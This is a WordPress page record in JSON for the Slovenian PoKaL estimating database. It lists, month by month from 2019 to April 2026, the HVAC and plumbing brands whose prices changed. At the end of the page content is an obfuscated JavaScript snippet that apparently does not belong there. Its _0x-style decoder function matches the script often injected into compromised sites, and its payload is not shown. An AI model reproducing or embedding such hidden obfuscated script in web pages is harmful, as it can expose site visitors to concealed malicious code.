{"id":15,"date":"2019-03-16T16:42:28","date_gmt":"2019-03-16T16:42:28","guid":{"rendered":"http:\/\/localhost:81\/wordpress\/?page_id=15"},"modified":"2026-04-17T07:19:52","modified_gmt":"2026-04-17T07:19:52","slug":"za-uporabnike","status":"publish","type":"page","link":"https:\/\/pokal.si\/index.php\/za-uporabnike\/","title":{"rendered":"Novice"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">Zadnja verzija baze na internetu:<\/h2>\n\n\n\n<ul>\n<li><strong>16.04.2026 &#8211; Viri<\/strong><\/li>\n\n\n\n<li><strong>16.04.2026<\/strong> <strong>&#8211; Kosovnice<\/strong><\/li>\n\n\n\n<li>Zadnja verzija programa: 6.00.42i<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Obvestila o a\u017euriranju virov:<\/h2>\n\n\n\n<p><strong>V navedenem mesecu so se v PoKaL-ovi bazi virov spremenile cene naslednjim blagovnim znamkam in skupinam proizvodov:<\/strong><\/p>\n\n\n\n<p>April 2026:<br>DANFOSS, KOLO, VAFRA, ITAP, HL, SUNSYSTEM, GEBERIT, OVENTROP, FRAGMAT hidroizolacije, IMP PUMPS, BUGATTI, TIEMME, KOLPA, VALSIR mixal, pexal, triplus, posode REFLEX, KORADO, HULIOT, FRAGMAT termo+ploskovno, ARMACELL,<\/p>\n\n\n\n<p>Marec 2026:<br>BUGATTI, DL RADIATORS, CALEFFI, GEBERIT, UPONOR, GALLUS, VAILLANT, MITSUBISHI ELECTRIC, KOIN, KNAUF INSULATION, HAWLE, DAIKIN, FAR,<\/p>\n\n\n\n<p>Februar 2026:<br>KOLPASAN, KOVINA, HERZ, UNITAS, ARMACELL, ENERKON, MHE talno, posode REFLEX, HONEYWELL, AKLIMAT, VILLEROY&amp;BOCH, ACO kanalete, CMC SAINT-GOBAIN PAM,<\/p>\n\n\n\n<p>Januar 2026:<br>BELIMO, fitingi TITAN, ESBE, DANFOSS, WILO, HELIOS, VORTICE, IMI Climate Control, AUSTRIA EMAIL, TIKI, SIEMENS, GRUNDFOS, HANSGROHE, GROHE, SAUTER, SCHELL, ARMACELL, KLIMAOPREMA, ZAGO\u017dEN-vse, OVENTROP, JIKA, LAUFEN, GORENJE GSI, HATRIA,<\/p>\n\n\n\n<p>September, Oktober, November, December 2025:<br>ARMACELL, AKLIMAT, TIKI HVAC, GALLUS, DEDIETRICH plin, MHE talno, VILLEROY&amp;BOCH, Cu cevi,<\/p>\n\n\n\n<p>Maj, Junij, Julij, Avgust 2025:<br>VIEGA, Cu fitingi, SABIANA-konvektorji, dobavitelj BOSSPLAST-vse, KOLPA, Profipress, Prestabo, Sanpress, Temponox, CATALANO, Armature ARI, GESTRA, KONARIK, ACO, BELIMO, IMP ARMATURE<\/p>\n\n\n\n<p>Marec, April 2025:<br>HANSA, VORTICE, HELIOS, GROHE, Cu cevi, KOLO, GEBERIT, HL, MITSUBISHI, SAMSUNG, PAM GLOBAL, FRAGMAT, VAILLANT, REHAU, DAIKIN<\/p>\n\n\n\n<p>Februar 2025:<br>UPONOR, SCHELL, HONEYWELL, KOLPA, IMI (TA), Cu (IKA), COMAP, TACO, THERMOMAT, SIEMENS,<\/p>\n\n\n\n<p>Januar 2025:<br>CALEFFI, DANFOSS, SAUTER, TITAN-Cimos, GRUNDFOS, WILO, KOVINA, ESBE, UNITAS, GROHE, LIV, SYSTEMAIR, KLIMAOPREMA, ARMACELL, KNAUFINSULATION, IKA, LAUFEN, HANSGROHE, VAILLANT, <\/p>\n\n\n\n<p>Avgust, September, Oktober 2024:<br>PRESTABO, TEMPONOX, KOIN, FLAMCO, KRONOTERM, Bakrene cevi<\/p>\n\n\n\n<p class=\"has-text-align-left\">Maj, Junij 2024:<br>BIAL, KORADO, Cu cevi, IMI Hydronic, FRAGMAT, KORADO, BIAL, Cu cevi, Spiro cevi in oblikovni kosi, GALLUS, DOLOMITE, Sanpress, Profipress,  <\/p>\n\n\n\n<p class=\"has-text-align-left\">Marec, April 2024:<br>OVENTROP, ESBE, AKLIMAT, INDA, DUNGS, IMI Hydronic, REFLEX, MITSUBISHI, HL, IKA selektivno, WILO, ARMACELL, CATALANO, FRAGMAT, VIEGA Visign, IMP PUMPS, GEBERIT, Cu cevi, KAN-THERM, DL RADIATORS, <\/p>\n\n\n\n<p class=\"has-text-align-left\">Februar 2024:<br>Sanpress, Temponox, Prestabo, JIKA, LAUFEN, GROHE, Vselect zalogovniki, SUNSYSTEM, VORTICE, HELIOS, HATRIA,<\/p>\n\n\n\n<p class=\"has-text-align-left\">Januar 2024:<br>SCHELL, SAUTER, GRUNDFOS, HANSA, SYSTEMAIR, G.BEE, DANFOSS, HONEYWELL, HERZ, BELIMO,<\/p>\n\n\n\n<p class=\"has-text-align-left\">Oktober November, December 2023:<br>VAILLANT, SYSTEMAIR ventilatorji, KLIMAOPREMA, HANSGROHE,<\/p>\n\n\n\n<p class=\"has-text-align-left\">Julij, Avgust, September 2023:<br>UNITAS, KOIN, VARSIR MIXAL, TOSHIBA, ARMACELL, Cu cevi,<\/p>\n\n\n\n<p class=\"has-text-align-left\">April, Maj, Junij 2023:<br>VAILLANT, FLAMCO, VILLEROY&amp;BOCH, HERZ, SPIRO cevi, RUCK, ITAP, MGK, ARMAFLEX DUOSOLAR, VAFRA, BRANDONI, DANFOSS, KOLPA, \u0160TERN Cu cevi, VSELECT,<\/p>\n\n\n\n<p class=\"has-text-align-left\">Marec 2023:<br>OVENTROP, ARMACELL, UPONOR, CALEFFI, DE DIETRICH, WAVIN, \u010crne cevi, Poc. cevi, VSELECT, FRAGMAT, MITSUBISHI, DAIKIN, KAIMANN,<\/p>\n\n\n\n<p class=\"has-text-align-left\">Februar 2023:<br>Cu cevi IKA, MHE, VAILLANT, SYSTEMAIR, KRONOTERM, REFLEX, KORADO kopalni\u0161ki, KOIN,  IMI Hydronic, ANDOTEHNA, JAKO, HELIOS, ARISTON,<\/p>\n\n\n\n<p class=\"has-text-align-left\">Januar 2023:<br>KOLO, BELIMO, re\u0161etke SYSTEMAIR NOVA, GEBERIT, SCHELL, vse IKA, DANFOSS, WILO, GRUNDFOS, VORTICE, VIESSMANN, HANSGROHE, VIEGA Visign, LAUFEN, JIKA, G.BEE,  CMC SAINT-GOBAIN, SAUTER, KNAUFINSULATION, IMP ARMATURE,<\/p>\n\n\n\n<p class=\"has-text-align-left\">November December 2022:<br>VILLEROY&amp;BOCH, VAILLANT, AKLIMAT, HATRIA, ZAGO\u017dEN, SANPRESS, PRESTABO, HENRAD,<\/p>\n\n\n\n<p class=\"has-text-align-left\">September Oktober 2022:<br>DANFOSS, Cu cevi, SYSTEMAIR, SABIANA, HL, LIV, GROHE, DOLOMITE, LAUFEN, JIKA, INKER, IMP PUMPS, RADOPRESS, MASTER 3 PLUS,  G.BEE,  KROMSCHRODER, <\/p>\n\n\n\n<p class=\"has-text-align-left\">Julij Avgust 2022:<br>VIESSMANN, ACO kopalnica, FIR\u0160T,  MITSUBISHI Electric, GROHE, CATALANO, HANSA, BIAL, VSELECT, Cu fitingi, CALEFFI, SELTRON, REHAU, DAIKIN, GIA,  IMI HYDRONIC, SAUTER, OC IMP KLIMA, Novo:GEBERIT FlowFit,  HATRIA, VIEGA SANPRESS, BELIMO, KOIN, <\/p>\n\n\n\n<p class=\"has-text-align-left\">Junij 2022:<br>GORENJE TIKI, KOLO, JIKA, AKLIMAT,  GEBERIT, VAILLANT, IMP PUMPS, VORTICE, KRONOTERM, GRUNDFOS, HANSGROHE, SCHELL, TOTRA, ARMACELL, KAIMANN,  ZAGO\u017dEN, AQUATHERM, DAIKIN klime, SYSTEMAIR naprave, RUCK, BOSSPLAST, WALRAVEN, LIMODOR, KLIMAOPREMA, GIACOMINI, COMAP, +GF+,<\/p>\n\n\n\n<p class=\"has-text-align-left\">Maj 2022:<br>WILO,  PROFIPRESS, PRESTABO, REHAU, INDA, DANFOSS, ARISTON, LAUFEN, LIV, Cu cevi, VILLEROY&amp;BOCH, UNITAS, KOVINA, CORDIVARI, ZILMET, POLIX, press sistem IBP GROUP, BOSCH, LIM-MONT, INOX 304, 316 delno, VSELECT, ESBE, HULIOT, OVENTROP, IMP ARMATURE, SYSTEMAIR distribucija, HELIOS, G.BEE, LAUFENrev., JIKA, FRAGMAT,<\/p>\n\n\n\n<p class=\"has-text-align-left\">April 2022:<br>KAIMANN, VIEGA VISIGN, TITAN, APOLLO, KOLPA SAN, HERZ, UPONOR, IMP PUMPS, IKA, DOLOMITE, KORADO, DUOSOLAR, FRAGMAT, DL RADIATORS, BUGATTI, UPONOR drugi\u010d, \u010cRNE CEVI, PRIROBNICE, DE DIETRICH, AUSTRIA EMAIL, MITSUBISHI, ENERKON,  KNAUF INSULATION,<\/p>\n\n\n\n<p class=\"has-text-align-left\">Marec 2022:<br>KNAUF INSULATION, DAIKIN ALTHERMA, AKLIMAT, KOIN, ELMER, CMC SAINT-GOBAIN vodovod, CMC PAM GLOBAL-S, LAUFEN, ALFA LAVAL,<\/p>\n\n\n\n<p class=\"has-text-align-left\">Februar 2022:<br>SYSTEMAIR, OVENTROP, Cu cevi in lot fitingi, KLIMA CELJE, PRESTABO, PROFIPRESS, SANPRESS, ARMACELL, DUOSOLAR, GORENJE-TIKI, INDA, KOLPA, HERZ,  IMI HYDRONIC, APOLLO, POLIX, KLIMAOPREMA, VIKING, MINIMAX, VAILLANT, ARMSTRONG, ZETKAMA, VYC, NORIS, SPIROTECH, VSELECT, GRUNDFOS, BELIMO,<\/p>\n\n\n\n<p class=\"has-text-align-left\">Januar 2022:<br>VIESSMANN, MITSUBISHI  ELECTRIC, VIEGA VISIGN, GEBERIT, SAUTER, SYSTEMAIR, DANFOSS, CATALANO, KOLO, SIEMENS, GIACOMINI, ZILMET, IBP GROUP, \u010drne cevi, VALSIR, UPONOR, KOVINA, UNITAS, SCHELL, GROHE, LIV, GRUNDFOS, WILO, IMP PUMPS, AUSTRIA EMAIL, TITAN, VORTICE, HELIOS,  CMC SAINT-GOBAIN, FAR, ESBE, BUGATTI, DELONGHI, FLAMCO, LAUFEN, JIKA, DOLOMITE, KRONOTERM, REHAU, INOX VODOTERM, RUCK, WALRAVEN, BOSSPLAST,<\/p>\n\n\n\n<p class=\"has-text-align-left\">December 2021:<br>IMP PUMPS, KAIMANN, Cu cevi, Cu fazoni,  CMC SAINT-GOBAIN PAM, HANSGROHE, <\/p>\n\n\n\n<p class=\"has-text-align-left\">November 2021:<br>PRESTABO, APOLLO, OVENTROP, AKLIMAT, POLIX, Cu cevi, VIEGA Sanpress inox, ARISTON, dodan odto\u010dni sistem MASTER 3 PLUS, KORADO, dodan sistem RADOPRESS, VILLEROY&amp;BOCH, <\/p>\n\n\n\n<p class=\"has-text-align-left\">Oktober 2021:<br>MITSUBISHI ELECTRIC, TITAN, HL, FLAMCO, cevi in fitingi IBP Group, COMAP, APOLLO, CORDIVARI, \u010drne cevi, prirobnice, varilni fazoni, GIACOMINI,  IMI HYDRONIC, PAM GLOBAL-S, REFLEX, Cu fitingi \u0160tern, KRONOTERM, BIAL, VAILLANT, AQUATHERM, ACO hi\u0161a in vrt, VOGEL&amp;NOOT,  KNAUF INSULATION, <\/p>\n\n\n\n<p class=\"has-text-align-left\">September 2021:<br>OVENTROP, UNITAS, HERZ, KOVINA, DL RADIATORS, FRAGMAT, DANFOSS(9), VSELECT, LIMMONT, WALRAVEN, RUCK, TROX, MANDIK, BOSSPLAST, spiro kanali, ACO, SYSTEMAIR, VIEGA (Cu), JIKA, LAUFEN, ARI, GESTRA, IMP ARMATURE,<\/p>\n\n\n\n<p class=\"has-text-align-left\">Julij 2021:<br>VIESSMANN, FAR, APOLLO, GRUNDFOS, GROHE, HANSGROHE, KOLPA, HERZ, SCHELL, CALEFFI, UPONOR, GEBERIT, LIV, ESBE, FLAMCO, KLIMAOPREMA, BEE, BELIMO, <\/p>\n\n\n\n<p class=\"has-text-align-left\">Avgust 2021:<br>VILLEROY&amp;BOCH, GORENJE, AUSTRIA EMAIL, AKLIMAT, Cu fitingi in cevi \u0160TERN, IBG (cevovodi PVC-U), IMP PUMPS, WILO, ESBE, VAILLANT, HANSA, GALLUS, INDA, HAWLE,  CMC PAM, <\/p>\n\n\n\n<p class=\"has-text-align-left\">Junij 2021:<br>KRONOTERM, ARMACELL, ZILMET, DELONGHI, BUGATTI, VSELECT, DEDIETRICH, TITAN, KOIN, REHAU, KOVINA, UNITAS, BIAL, VOGEL&amp;NOOT,  <br>PAM GLOBAL-S, FAR, KORADO, IBP press sistemi, MANDIK, KNAUF INSULATION, APOLLO, GIACOMINI, \u010drne in pocinkane cevi, IMI HYDRONIC, POLIX, REMTY, SYSTEMAIR,<\/p>\n\n\n\n<p class=\"has-text-align-left\">Maj 2021:<br>WILO, CORDIVARI, COMAP, \u010drne cevi, VIEGA cevni sistemi, DANFOSS, GEBERIT,  bakrene cevi, DOLOMITE, KOLO, VSELECT, WAVIN, VORTICE, TROX, kanali za prezra\u010devanje, DAIKIN, ELMER, IMP PUMPS, SELTRON<\/p>\n\n\n\n<p class=\"has-text-align-left\">April 2021:<br>LIV, HL, CATALANO, CALEFFI,  AUSTRIA EMAIL-drugi\u010d, FAR, HERZ, BUGATTI, OVENTROP,  Bakrene cevi-tretji\u010d, DANFOSS-drugi\u010d, ACO, REHAU, IMP ARMATURE, MITSUBISHI ELECTRIC, KNAUF INSULATION, TOTRA PIPES,  Bakreni fazoni-drugi\u010d, VIESSMANN, VALSIR TRIPLUS <\/p>\n\n\n\n<p class=\"has-text-align-left\">Marec 2021:<br>AUSTRIA EMAIL, GORENJE TIKI, ARISTON, AKLIMAT, grelniki VSELECT, RADEL, DELONGHI, CORDIVARI, ZILMET, Bakrene cevi, FRAGMAT, ALPRO, REFLEX, KORADO, HELIOS, VORTICE, CMC PAM-drugi\u010d, KRONOTERM, VOGEL&amp;NOOT, HAWLE, URSA,<\/p>\n\n\n\n<p class=\"has-text-align-left\">Februar 2021:<br>Bakreni fazoni, SAUTER, GROHE, DOLOMITE, SCHELL, KOVINA, UNITAS, KOLPA SAN, HATRIA, UPONOR, FLAMCO, IKA, LAUFEN, VAILLANT, Bakrene cevi, navojne cevi, rad.APOLLO,<\/p>\n\n\n\n<p class=\"has-text-align-left\">Januar 2021:<br>VIESSMANN, GRUNDFOS, TITAN, Bakrene cevi, HANSGROHE, HANSA,  DANFOSS, CMC SAINT-GOBAIN PAM, POLOPLAST, SYSTEMAIR, OC IMP KLIMA, <\/p>\n\n\n\n<p class=\"has-text-align-left\">Avgust, September 2020:<br>WILO, VIEGA Prestabo, OVENTROP, VIESSMANN, VAILLANT, keramika JIKA, OTER, SIEMENS, DE DIETRICH, spremembe DANFOSS, korekcija BOSSPLAST, REFLEX, ESBE,<\/p>\n\n\n\n<p class=\"has-text-align-left\">Maj, Junij 2020:<br>Klime DeDietrich, VIEGA Profipress, Sanpress, ENERKON, MITSUBISHI ELECTRIC, TOSHIBA, keramika GEBERIT in KOLO, CMC c.kape, LINDAB AZR-4, IMP PUMPS, COMA COMMERCE,<\/p>\n\n\n\n<p class=\"has-text-align-left\">Marec, April 2020:<br>AKLIMAT, LINDAB, SPIROTECH, ARMSTRONG, VYC, ZETKAMA, INOX cevovodi in varilni fazoni, FRAGMAT, DOLOMITE, KNAUF INSULATION, LIMODOR (Bossplast), IMI Hydronic, LIV Postojna, Hutterer &amp; Lechner, GEBERIT, CORDIVARI,  Villeroy&amp;Boch, INOL, KRONOTERM, DAIKIN, VIESSMANN, ALPRO, ELMER<\/p>\n\n\n\n<p class=\"has-text-align-left\">Februar 2020:<br>DANFOSS, KAIMANN, TROX, JIKA, KOLPA, LAUFEN, SCHELL, UNITAS, KOVINA, INDA, SAUTER, VAILLANT, VORTICE, HELIOS, GF<\/p>\n\n\n\n<p class=\"has-text-align-left\">Januar 2020:<br>GRUNDFOS, VIESSMANN, FEINROHREN, HANSGROHE, HANSA, GROHE, CALEFFI, TITAN fitingi, AUSTRIA EMAIL, PROMAT, <\/p>\n\n\n\n<p class=\"has-text-align-left\">September, Oktober 2019:<br>POLIX, ZILMET, VIESSMANN, DeDietrich, PAM Global S,  razli\u010dni proizvodi IKA, Dodane nove \u010drpalke Wilo Stratos MAXO in proizvodi GEBERIT Silent-PRO, <\/p>\n\n\n\n<p class=\"has-text-align-left\">Junij, Julij 2019:<br>BOSSPLAST, \u0160TERN in proizvodi CATALANO, SIKLA, ESBE, POLOKAL; cena bakra je padla, UPONOR, VOGEL&amp;NOOT, GROHE <\/p>\n\n\n\n<p class=\"has-text-align-left\">April, Maj 2019:<br>GEBERIT, IMI, GRUNDFOS, WILO, HL, SYSTEMAIR, PICHLER, LINDAB, OVENTROP, HATRIA, VIEGA, GROHE, KOIN, ALPRO, TOTRA, REHAU, KRONOTERM, BELIMO, HAWLE, IMP ARMATURE, \u0160TERN, VAILLANT, WIKING, ENERKON, IMP PUMPS <\/p>\n\n\n\n<p>1.1.2019 do 1.3.2019: DANFOSS. HELIOS, GF, &nbsp;MITSUBISHI, SAUTER,  KOVINA, UNITAS, JIKA, DOLOMITE, litina DUCTIL, HANSA, HANSGROHE, KOLPA,  SCHELL, CALEFFI, KAIMANN, TROX, S&amp;P, RUCK <\/p>\n\n\n\n<p><\/p>\n\n\n<\/p>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>Zadnja verzija baze na internetu: Obvestila o a\u017euriranju virov: V navedenem mesecu so se v PoKaL-ovi bazi virov spremenile cene naslednjim blagovnim znamkam in skupinam proizvodov: April 2026:DANFOSS, KOLO, VAFRA, ITAP, HL, SUNSYSTEM, GEBERIT, OVENTROP, FRAGMAT hidroizolacije, IMP PUMPS, BUGATTI, TIEMME, KOLPA, VALSIR mixal, pexal, triplus, posode REFLEX, KORADO, HULIOT, FRAGMAT termo+ploskovno, ARMACELL, Marec 2026:BUGATTI, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"_links":{"self":[{"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/pages\/15"}],"collection":[{"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/comments?post=15"}],"version-history":[{"count":649,"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/pages\/15\/revisions"}],"predecessor-version":[{"id":1207,"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/pages\/15\/revisions\/1207"}],"wp:attachment":[{"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/media?parent=15"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}